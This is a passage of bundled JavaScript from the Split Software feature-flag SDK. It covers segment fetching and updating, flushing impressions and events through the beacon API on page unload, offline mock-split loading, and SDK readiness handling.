 */

var parseSegments = function parseSegments(conditions) {
  var segments = new __WEBPACK_IMPORTED_MODULE_0__utils_lang_Sets__["a" /* _Set */]();
  conditions.forEach(function (condition) {
    var matchers = condition.matcherGroup.matchers;
    matchers.forEach(function (matcher) {
      var matcherType = matcher.matcherType,
          userDefinedSegmentMatcherData = matcher.userDefinedSegmentMatcherData;

      if (matcherType === 'IN_SEGMENT') {
        segments.add(userDefinedSegmentMatcherData.segmentName);
      }
    });
  });
  return segments;
};

/* harmony default export */ __webpack_exports__["a"] = (parseSegments);

/***/ }),
/* 2874 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = MySegmentsUpdaterFactory;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang_Errors__ = __webpack_require__(280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__fetcher_MySegments__ = __webpack_require__(2875);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-producer:my-segments');

function MySegmentsUpdaterFactory(context) {
  var _context$getAll = context.getAll(),
      settings = _context$getAll[context.constants.SETTINGS],
      readiness = _context$getAll[context.constants.READINESS],
      storage = _context$getAll[context.constants.STORAGE],
      metricCollectors = _context$getAll[context.constants.COLLECTORS];

  var segmentsEventEmitter = readiness.segments;
  var readyOnAlreadyExistentState = true;
  var startingUp = true; // @TODO if allowing custom storages, handle async execution and wrap errors as SplitErrors to distinguish from user callback errors

  function updateSegments(segmentsData) {
    var mySegmentsCache = storage.segments;
    var shouldNotifyUpdate;

    if (Array.isArray(segmentsData)) {
      // Update the list of segment names available
      shouldNotifyUpdate = mySegmentsCache.resetSegments(segmentsData);
    } else {
      // Add/Delete the segment
      var name = segmentsData.name,
          add = segmentsData.add;

      if (mySegmentsCache.isInSegment(name) !== add) {
        shouldNotifyUpdate = true;
        if (add) mySegmentsCache.addToSegment(name);else mySegmentsCache.removeFromSegment(name);
      } else {
        shouldNotifyUpdate = false;
      }
    } // Notify update if required


    if (storage.splits.usesSegments() && (shouldNotifyUpdate || readyOnAlreadyExistentState)) {
      readyOnAlreadyExistentState = false;
      segmentsEventEmitter.emit(segmentsEventEmitter.SDK_SEGMENTS_ARRIVED);
    }
  }
  /**
   * MySegments updater returns a promise that resolves with a `false` boolean value if it fails to fetch mySegments or synchronize them with the storage.
   *
   * @param {number | undefined} retry current number of retry attemps. this param is only set by SplitChangesUpdater itself.
   * @param {string[] | { name: string, add: boolean } | undefined} segmentsData it can be:
   *  (1) the list of segment names to sync in the storage,
   *  (2) an object with a segment name and action (true: add, or false: delete) to update the storage,
   *  (3) or `undefined`, for which the updater will fetch mySegments in order to sync the storage.
   * @param {boolean | undefined} noCache true to revalidate data to fetch
   */


  return function MySegmentsUpdater(retry, segmentsData, noCache) {
    if (retry === void 0) {
      retry = 0;
    }

    var updaterPromise;

    if (segmentsData) {
      // If segmentsData is provided, there is no need to fetch mySegments
      updaterPromise = new Promise(function (res) {
        updateSegments(segmentsData);
        res();
      });
    } else {
      // NOTE: We only collect metrics on startup.
      updaterPromise = Object(__WEBPACK_IMPORTED_MODULE_2__fetcher_MySegments__["a" /* default */])(settings, startingUp, metricCollectors, noCache).then(function (segments) {
        // Only when we have downloaded segments completely, we should not keep retrying anymore
        startingUp = false;
        updateSegments(segments);
      });
    }

    return updaterPromise.catch(function (error) {
      // handle user callback errors
      if (!(error instanceof __WEBPACK_IMPORTED_MODULE_1__utils_lang_Errors__["a" /* SplitError */])) setTimeout(function () {
        throw error;
      }, 0);

      if (startingUp && settings.startup.retriesOnFailureBeforeReady > retry) {
        retry += 1;
        log.warn("Retrying download of segments #" + retry + ". Reason: " + error);
        return MySegmentsUpdater(retry);
      } else {
        startingUp = false;
      }

      return false; // shouldUpdate = false
    });
  };
}

/***/ }),
/* 2875 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_promise_timeout__ = __webpack_require__(1292);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_lang_Errors__ = __webpack_require__(280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__services_mySegments__ = __webpack_require__(2876);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__services_mySegments_get__ = __webpack_require__(2877);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/






var mySegmentsFetcher = function mySegmentsFetcher(settings, startingUp, metricCollectors, noCache) {
  if (startingUp === void 0) {
    startingUp = false;
  }

  var mySegmentsPromise = Object(__WEBPACK_IMPORTED_MODULE_3__services_mySegments__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_4__services_mySegments_get__["a" /* default */])(settings, noCache));
  mySegmentsPromise = __WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].start(__WEBPACK_IMPORTED_MODULE_1__utils_timeTracker__["a" /* default */].TaskNames.MY_SEGMENTS_FETCH, startingUp ? metricCollectors : false, mySegmentsPromise); // Decorate with the timeout functionality if required

  if (startingUp) {
    mySegmentsPromise = Object(__WEBPACK_IMPORTED_MODULE_0__utils_promise_timeout__["a" /* default */])(settings.startup.requestTimeoutBeforeReady, mySegmentsPromise);
  } // Extract segment names


  return mySegmentsPromise // JSON parsing errors are handled as SplitErrors, to distinguish from user callback errors
  .then(function (resp) {
    return resp.json().catch(function (error) {
      throw new __WEBPACK_IMPORTED_MODULE_2__utils_lang_Errors__["a" /* SplitError */](error.message);
    });
  }).then(function (json) {
    return json.mySegments.map(function (segment) {
      return segment.name;
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (mySegmentsFetcher);

/***/ }),
/* 2876 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 2877 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = GET;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__request__ = __webpack_require__(203);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_key_factory__ = __webpack_require__(492);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function GET(settings, noCache) {
  /**
   * URI encoding of user keys in order to:
   *  - avoid 400 responses (due to URI malformed). E.g.: '/api/mySegments/%'
   *  - avoid 404 responses. E.g.: '/api/mySegments/foo/bar'
   *  - match user keys with special characters. E.g.: 'foo%bar', 'foo/bar'
   */
  return Object(__WEBPACK_IMPORTED_MODULE_0__request__["a" /* default */])(settings, "/mySegments/" + encodeURIComponent(Object(__WEBPACK_IMPORTED_MODULE_1__utils_key_factory__["b" /* matching */])(settings.core.key)), undefined, noCache ? __WEBPACK_IMPORTED_MODULE_0__request__["b" /* noCacheExtraHeader */] : undefined);
}

/***/ }),
/* 2878 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BrowserSignalListener; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__services_events_bulk__ = __webpack_require__(1290);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__services_events__ = __webpack_require__(1289);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__services_impressions_bulk__ = __webpack_require__(1286);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__services_impressions_count__ = __webpack_require__(1287);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__services_impressions__ = __webpack_require__(1285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__services_impressions_dto__ = __webpack_require__(1288);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_object_assign__);









var log = Object(__WEBPACK_IMPORTED_MODULE_6__utils_logger__["b" /* default */])('splitio-client:cleanup'); // 'unload' event is used instead of 'beforeunload', since 'unload' is not a cancelable event, so no other listeners can stop the event from occurring.

var UNLOAD_DOM_EVENT = 'unload';
/**
 * We'll listen for 'unload' event over the window object, since it's the standard way to listen page reload and close.
 *
 */

var BrowserSignalListener = /*#__PURE__*/function () {
  function BrowserSignalListener(context, syncManager) {
    this.storage = context.get(context.constants.STORAGE);
    this.settings = context.get(context.constants.SETTINGS);
    this.syncManager = syncManager;
    this.flushData = this.flushData.bind(this);

    if (this.settings.sync.impressionsMode === __WEBPACK_IMPORTED_MODULE_7__utils_constants__["h" /* OPTIMIZED */]) {
      this.impressionsCounter = context.get(context.constants.IMPRESSIONS_COUNTER);
    }
  }
  /**
   * start method.
   * Called when SplitFactory is initialized.
   * We add a handler on unload events. The handler flushes remaining impressions and events to the backend.
   */


  var _proto = BrowserSignalListener.prototype;

  _proto.start = function start() {
    if (typeof window !== 'undefined' && window.addEventListener) {
      log.debug('Registering flush handler when unload page event is triggered.');
      window.addEventListener(UNLOAD_DOM_EVENT, this.flushData);
    }
  }
  /**
   * stop method.
   * Called when client is destroyed.
   * We need to remove the handler for unload events, since it can break if called when Split context was destroyed.
   */
  ;

  _proto.stop = function stop() {
    if (typeof window !== 'undefined' && window.removeEventListener) {
      log.debug('Deregistering flush handler when unload page event is triggered.');
      window.removeEventListener(UNLOAD_DOM_EVENT, this.flushData);
    }
  }
  /**
   * _flushData method.
   * Called when unload event is triggered. It flushed remaining impressions and events to the backend,
   * using beacon API if possible, or falling back to regular post transport.
   */
  ;

  _proto.flushData = function flushData() {
    this._flushImpressions();

    this._flushEvents();

    if (this.impressionsCounter) {
      this._flushImpressionsCount();
    } // Close streaming


    if (this.syncManager && this.syncManager.pushManager) this.syncManager.pushManager.stop();
  };

  _proto._flushImpressions = function _flushImpressions() {
    var impressions = this.storage.impressions; // if there are impressions in storage, send them to backend

    if (!impressions.isEmpty()) {
      var url = this.settings.url('/testImpressions/beacon');
      var impressionsPayload = Object(__WEBPACK_IMPORTED_MODULE_5__services_impressions_dto__["a" /* fromImpressionsCollector */])(impressions, this.settings);
      var extraMetadata = {
        // sim stands for Sync/Split Impressions Mode
        sim: this.settings.sync.impressionsMode === __WEBPACK_IMPORTED_MODULE_7__utils_constants__["h" /* OPTIMIZED */] ? __WEBPACK_IMPORTED_MODULE_7__utils_constants__["h" /* OPTIMIZED */] : __WEBPACK_IMPORTED_MODULE_7__utils_constants__["d" /* DEBUG */]
      };

      if (!this._sendBeacon(url, impressionsPayload, extraMetadata)) {
        Object(__WEBPACK_IMPORTED_MODULE_4__services_impressions__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_2__services_impressions_bulk__["a" /* default */])(this.settings, {
          body: JSON.stringify(impressionsPayload)
        }));
      }

      impressions.clear();
    }
  };

  _proto._flushImpressionsCount = function _flushImpressionsCount() {
    var impressionsCountPayload = {
      pf: Object(__WEBPACK_IMPORTED_MODULE_5__services_impressions_dto__["b" /* fromImpressionsCountCollector */])(this.impressionsCounter)
    };
    var imprCounts = impressionsCountPayload.pf.length;
    if (imprCounts === 0) return;
    var url = this.settings.url('/testImpressions/count/beacon');

    if (!this._sendBeacon(url, impressionsCountPayload)) {
      Object(__WEBPACK_IMPORTED_MODULE_4__services_impressions__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_3__services_impressions_count__["a" /* default */])(this.settings, {
        body: JSON.stringify(impressionsCountPayload)
      }));
    }
  };

  _proto._flushEvents = function _flushEvents() {
    var events = this.storage.events; // if there are events in storage, send them to backend

    if (!events.isEmpty()) {
      var url = this.settings.url('/events/beacon');
      var eventsPayload = events.toJSON();

      if (!this._sendBeacon(url, eventsPayload)) {
        Object(__WEBPACK_IMPORTED_MODULE_1__services_events__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_0__services_events_bulk__["a" /* default */])(this.settings, {
          body: JSON.stringify(eventsPayload)
        }));
      }

      events.clear();
    }
  }
  /**
   * _sendBeacon method.
   * Util method that check if beacon API is available, build the payload and send it.
   */
  ;

  _proto._sendBeacon = function _sendBeacon(url, data, extraMetadata) {
    // eslint-disable-next-line compat/compat
    if (typeof navigator !== 'undefined' && navigator.sendBeacon) {
      var json = {
        entries: data,
        token: this.settings.core.authorizationKey,
        sdk: this.settings.version
      }; // Extend with endpoint specific metadata where needed

      if (extraMetadata) __WEBPACK_IMPORTED_MODULE_8_object_assign___default()(json, extraMetadata); // Stringify the payload

      var payload = JSON.stringify(json); // eslint-disable-next-line compat/compat

      return navigator.sendBeacon(url, payload);
    }

    return false;
  };

  return BrowserSignalListener;
}();



/***/ }),
/* 2879 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__client__ = __webpack_require__(1280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__producer_offline__ = __webpack_require__(2880);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__ = __webpack_require__(202);



 //
// Create SDK instance for offline mode.
//

function SplitFactoryOffline(context, sharedTrackers) {
  var sharedInstance = !sharedTrackers;
  var readiness = context.get(context.constants.READINESS);
  var storage = context.get(context.constants.STORAGE);
  var statusManager = context.get(context.constants.STATUS_MANAGER); // In LOCALHOST mode, shared clients are ready in the next event-loop cycle than created
  // and then updated on each SDK_SPLITS_ARRIVED event

  if (sharedInstance) setTimeout(function () {
    readiness.splits.on(readiness.splits.SDK_SPLITS_ARRIVED, function () {
      readiness.gate.emit(readiness.gate.SDK_UPDATE);
    });
    readiness.gate.emit(readiness.gate.SDK_READY);
  }, 0); // Producer

  var producer = sharedInstance ? undefined : Object(__WEBPACK_IMPORTED_MODULE_2__producer_offline__["a" /* default */])(context); // Start background task for flag updates

  producer && producer.start();
  var api = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()( // Proto linkage of the EventEmitter to prevent any change
  Object.create(statusManager), // GetTreatment/s
  Object(__WEBPACK_IMPORTED_MODULE_1__client__["a" /* default */])(context), // Utilities
  {
    // Destroy instance. Async so we respect the online api.
    destroy: function destroy() {
      // Stop background jobs
      producer && producer.stop(); // Cleanup event listeners

      readiness.destroy(); // Cleanup storage

      storage.destroy && storage.destroy(); // Mark the factory as destroyed.

      context.put(context.constants.DESTROYED, true);
      !sharedInstance && Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["a" /* releaseApiKey */])();
      return Promise.resolve();
    }
  });
  return {
    api: api,
    metricCollectors: false // We won't collect any metrics on localhost mode.

  };
}

/* harmony default export */ __webpack_exports__["a"] = (SplitFactoryOffline);

/***/ }),
/* 2880 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__task__ = __webpack_require__(703);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__updater_SplitChangesFromFeatures__ = __webpack_require__(2881);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/



var OfflineFeatureProducer = function OfflineFeatureProducer(context) {
  var settings = context.get(context.constants.SETTINGS);
  var updater = Object(__WEBPACK_IMPORTED_MODULE_1__updater_SplitChangesFromFeatures__["a" /* default */])(context);
  var updaterTask = Object(__WEBPACK_IMPORTED_MODULE_0__task__["a" /* default */])(updater, settings.scheduler.offlineRefreshRate);
  return updaterTask;
};

/* harmony default export */ __webpack_exports__["a"] = (OfflineFeatureProducer);

/***/ }),
/* 2881 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = createSplitChangesFromObject;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__services_splitChanges_offline__ = __webpack_require__(2882);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__SplitChangesFromObject__ = __webpack_require__(2884);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function createSplitChangesFromObject(context) {
  var fetcher = Object(__WEBPACK_IMPORTED_MODULE_0__services_splitChanges_offline__["a" /* default */])();
  return Object(__WEBPACK_IMPORTED_MODULE_1__SplitChangesFromObject__["a" /* default */])(fetcher, context);
}

/***/ }),
/* 2882 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = createGetConfigurationFromSettings;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__parseCondition__ = __webpack_require__(2883);



function hasTreatmentChanged(prev, curr) {
  if (typeof prev !== typeof curr) return true;

  if (typeof prev === 'string') {
    // strings treatments, just compare
    return prev !== curr;
  } else {
    // has treatment and config, compare both
    return prev.treatment !== curr.treatment || prev.config !== curr.config;
  }
}

function createGetConfigurationFromSettings() {
  var previousMock = {
    'emptyMock': 1
  };

  function mockUpdated(currentData) {
    var names = Object.keys(currentData); // Different amount of items

    if (names.length !== Object.keys(previousMock).length) {
      previousMock = currentData;
      return true;
    }

    return names.some(function (name) {
      var newSplit = !previousMock[name];
      var newTreatment = hasTreatmentChanged(previousMock[name], currentData[name]);
      var changed = newSplit || newTreatment;
      if (changed) previousMock = currentData;
      return changed;
    });
  }

  return function getConfigurationFromSettings(settings) {
    var mockSettings = settings.features || {};
    if (!mockUpdated(mockSettings)) return false;
    var splitObjects = {};
    Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["d" /* forOwn */])(mockSettings, function (data, splitName) {
      var treatment = data;
      var config = null;

      if (Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["i" /* isObject */])(data)) {
        treatment = data.treatment;
        config = data.config || config;
      }

      var configurations = {};
      if (config !== null) configurations[treatment] = config;
      splitObjects[splitName] = {
        trafficTypeName: 'localhost',
        conditions: [Object(__WEBPACK_IMPORTED_MODULE_1__parseCondition__["a" /* default */])({
          treatment: treatment
        })],
        configurations: configurations
      };
    });
    return splitObjects;
  };
}

/***/ }),
/* 2883 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = parseCondition;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);

function parseCondition(data) {
  var treatment = data.treatment;

  if (data.keys) {
    return {
      conditionType: 'WHITELIST',
      matcherGroup: {
        combiner: 'AND',
        matchers: [{
          keySelector: null,
          matcherType: 'WHITELIST',
          negate: false,
          whitelistMatcherData: {
            whitelist: Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["j" /* isString */])(data.keys) ? [data.keys] : data.keys
          }
        }]
      },
      partitions: [{
        treatment: treatment,
        size: 100
      }],
      label: "whitelisted " + treatment
    };
  } else {
    return {
      conditionType: 'ROLLOUT',
      matcherGroup: {
        combiner: 'AND',
        matchers: [{
          keySelector: null,
          matcherType: 'ALL_KEYS',
          negate: false
        }]
      },
      partitions: [{
        treatment: treatment,
        size: 100
      }],
      label: 'default rule'
    };
  }
}

/***/ }),
/* 2884 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


var log = Object(__WEBPACK_IMPORTED_MODULE_1__utils_logger__["b" /* default */])('splitio-producer:offline');

function FromObjectUpdaterFactory(Fetcher, context) {
  var _context$getAll = context.getAll(),
      settings = _context$getAll[context.constants.SETTINGS],
      readiness = _context$getAll[context.constants.READINESS],
      storage = _context$getAll[context.constants.STORAGE];

  var startingUp = true;
  return function ObjectUpdater() {
    var splits = [];
    var loadError = null;
    var splitsMock = {};

    try {
      splitsMock = Fetcher(settings);
    } catch (err) {
      loadError = err;
      log.error("There was an issue loading the mock Splits data, no changes will be applied to the current cache. " + err);
    }

    if (!loadError && splitsMock) {
      log.debug('Splits data: ');
      log.debug(JSON.stringify(splitsMock));
      Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["d" /* forOwn */])(splitsMock, function (val, name) {
        splits.push([name, JSON.stringify({
          name: name,
          status: 'ACTIVE',
          killed: false,
          trafficAllocation: 100,
          defaultTreatment: 'control',
          conditions: val.conditions || [],
          configurations: val.configurations,
          trafficTypeName: val.trafficTypeName
        })]);
      });
      return Promise.all([storage.splits.flush(), // required to sync removed splits from mock
      storage.splits.setChangeNumber(Date.now()), storage.splits.addSplits(splits)]).then(function () {
        readiness.splits.emit(readiness.splits.SDK_SPLITS_ARRIVED);

        if (startingUp) {
          startingUp = false; // Emits SDK_READY_FROM_CACHE

          if (storage.splits.checkCache()) readiness.splits.emit(readiness.splits.SDK_SPLITS_CACHE_LOADED); // Only emits SDK_SEGMENTS_ARRIVED the first time for SDK_READY

          readiness.segments.emit(readiness.segments.SDK_SEGMENTS_ARRIVED);
        }
      });
    } else {
      return Promise.resolve();
    }
  };
}

/* harmony default export */ __webpack_exports__["a"] = (FromObjectUpdaterFactory);

/***/ }),
/* 2885 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = callbackHandlerContext;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_wrapper__ = __webpack_require__(2886);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_logger__ = __webpack_require__(9);



var log = Object(__WEBPACK_IMPORTED_MODULE_2__utils_logger__["b" /* default */])('');
var NEW_LISTENER_EVENT = 'newListener';
var REMOVE_LISTENER_EVENT = 'removeListener'; // default onRejected handler, that just logs the error, if ready promise doesn't have one.

function defaultOnRejected(err) {
  log.error(err);
}
/**
 * StatusManager factory.
 * Responsable of exposing public status API: ready promise, event emitter and constants (SDK_READY, etc).
 * It also updates client context according to status events and logs related warnings and errors.
 *
 * @param {Object} context client context
 * @param {number} internalReadyCbCount offset value of SDK_READY listeners that are added/removed internally
 * by the SDK. It is required to properly log the warning 'No listeners for SDK Readiness detected'
 */


function callbackHandlerContext(context, internalReadyCbCount) {
  if (internalReadyCbCount === void 0) {
    internalReadyCbCount = 0;
  }

  var gate = context.get(context.constants.READINESS).gate;
  var readyCbCount = 0;
  var isReady = false;
  var hasTimedout = false;
  var SDK_READY = gate.SDK_READY,
      SDK_READY_FROM_CACHE = gate.SDK_READY_FROM_CACHE,
      SDK_UPDATE = gate.SDK_UPDATE,
      SDK_READY_TIMED_OUT = gate.SDK_READY_TIMED_OUT;
  gate.on(REMOVE_LISTENER_EVENT, function (event) {
    if (event === SDK_READY) readyCbCount--;
  });
  gate.on(NEW_LISTENER_EVENT, function (event) {
    if (event === SDK_READY || event === SDK_READY_TIMED_OUT) {
      if (isReady) {
        log.error("A listener was added for " + (event === SDK_READY ? 'SDK_READY' : 'SDK_READY_TIMED_OUT') + " on the SDK, which has already fired and won't be emitted again. The callback won't be executed.");
      } else if (event === SDK_READY) {
        readyCbCount++;
      }
    }
  });
  var readyPromise = generateReadyPromise();
  gate.once(SDK_READY_FROM_CACHE, function () {
    log.info('Split SDK is ready from cache.');
    context.put(context.constants.READY_FROM_CACHE, true);
  });

  function generateReadyPromise() {
    var promise = Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_wrapper__["a" /* default */])(new Promise(function (resolve, reject) {
      gate.once(SDK_READY, function () {
        log.info('Split SDK is ready.');
        if (readyCbCount === internalReadyCbCount && !promise.hasOnFulfilled()) log.warn('No listeners for SDK Readiness detected. Incorrect control treatments could have been logged if you called getTreatment/s while the SDK was not yet ready.');
        context.put(context.constants.READY, true);
        isReady = true;
        resolve();
      });
      gate.once(SDK_READY_TIMED_OUT, function (error) {
        context.put(context.constants.HAS_TIMEDOUT, true);
        hasTimedout = true;
        reject(error);
      });
    }), defaultOnRejected);
    return promise;
  }

  return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()( // Expose Event Emitter functionality
  Object.create(gate), {
    // Expose the event constants without changing the interface
    Event: {
      SDK_READY: SDK_READY,
      SDK_READY_FROM_CACHE: SDK_READY_FROM_CACHE,
      SDK_UPDATE: SDK_UPDATE,
      SDK_READY_TIMED_OUT: SDK_READY_TIMED_OUT
    },

    /**
     * Returns a promise that will be resolved once the SDK has finished loading (SDK_READY event emitted) or rejected if the SDK has timedout (SDK_READY_TIMED_OUT event emitted).
     * As it's meant to provide similar flexibility to the event approach, given that the SDK might be eventually ready after a timeout event, calling the `ready` method after the
     * SDK had timed out will return a new promise that should eventually resolve if the SDK gets ready.
     *
     * Caveats: the method was designed to avoid an unhandled Promise rejection if the rejection case is not handled, so that `onRejected` handler is optional when using promises.
     * However, when using async/await syntax, the rejection should be explicitly propagated like in the following example:
     * ```
     * try {
     *   await client.ready().catch((e) => { throw e; });
     *   // SDK is ready
     * } catch(e) {
     *   // SDK has timedout
     * }
     * ```
     *
     * @function ready
     * @returns {Promise<void>}
     */
    ready: function ready() {
      if (hasTimedout) {
        if (!isReady) {
          return Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_wrapper__["a" /* default */])(Promise.reject('Split SDK has emitted SDK_READY_TIMED_OUT event.'), defaultOnRejected);
        } else {
          return Promise.resolve();
        }
      }

      return readyPromise;
    },
    // Expose context for internal purposes only. Not considered part of the public API, and will be removed eventually.
    __context: context
  });
}

/***/ }),
/* 2886 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = promiseWrapper;
/**
 * wraps a given promise in a new one with a default onRejected function,
 * that handles the promise rejection if not other onRejected handler is provided.
 *
 * Caveats:
 *  - There are some cases where the `defaultOnRejected` handler is not invoked
 * and the promise rejection must be handled by the user (same as the Promise spec):
 *    - using async/await syntax with a transpiler to Promises
 *    - setting an `onFinally` handler as the first handler (e.g. `promiseWrapper(Promise.reject()).finally(...)`)
 *    - setting more than one handler with at least one of them being an onRejected handler
 *  - If the wrapped promise is rejected when using native async/await syntax, the `defaultOnRejected` handler is invoked
 * and neither the catch block nor the remaining try block are executed.
 *
 * @param customPromise promise to wrap
 * @param defaultOnRejected default onRejected function
